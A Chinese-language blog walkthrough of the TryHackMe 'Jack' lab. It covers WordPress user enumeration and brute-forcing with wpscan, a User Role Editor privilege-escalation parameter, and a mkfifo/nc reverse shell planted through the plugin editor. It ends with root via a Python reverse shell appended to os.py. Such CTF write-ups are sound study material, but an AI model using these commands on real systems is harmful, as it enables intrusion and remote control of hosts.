扫描打点
没扫到什么有价值的
80
扫出来有
/admin
,看一下是wp
的站:1
wpscan --url http://jack.thm -e u
扫出来三个人
jack
wendy
danny
再爆破一下:
1
wpscan --url http://jack.thm/wp-login.php -U user.txt -P /usr/share/wordlists/fasttrack.txt
令人感慨的是
rockyou.txt
里面没有这个密码爆出来账密
wendy:changelater
wordpress
拿rce
进去后右下角看到版本
5.3.2
但这个内核没洞,看提示说的是
ure_other_roles
,查了一下ure
是wp
的插件User Role Editor
,有一个用户提权的洞根据描述是去
profile.php
点upadte profile
,在POST
请求里面加上ure_other_roles
参数,值为administrator
看到提到
admin
了:看到可以修改插件内容,在
plugin editor
里面随便改一个反弹shell
1
mkfifo /tmp/f;nc 10.0.127.37 4444 < /tmp/f | /bin/bash > /tmp/f
var/backup
备份横向在
jack
的家目录找到第一个flag
,以及提示:那就是去
/var/backup
找备份文件,看到id_rsa
下下来登录:横向到
jack
,但没有密码执行不了sudo
提权
看了一圈没什么,传个
pspy
扫一下扫到
然后不让用路径劫持了:
偷看一下,发现这里可以更改
os.py
。。。在
/usr/lib/python2.7/os.py
手动加一段反弹
shell
即可1
2
3
4
5
6
7
8echo 'import socket
import pty
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.10.127.37",8888))
dup2(s.fileno(),0)
dup2(s.fileno(),1)
dup2(s.fileno(),2)
pty.spawn("/bin/bash")'>>os.py
THM打靶日寄28-Jack
- 本文链接: http://noone40404.github.io/2024/11/22/THM打靶日寄28:Jack/
- 版权声明: 本博客所有文章除特别声明外,均采用 BY-NC-SA 许可协议。转载请注明出处!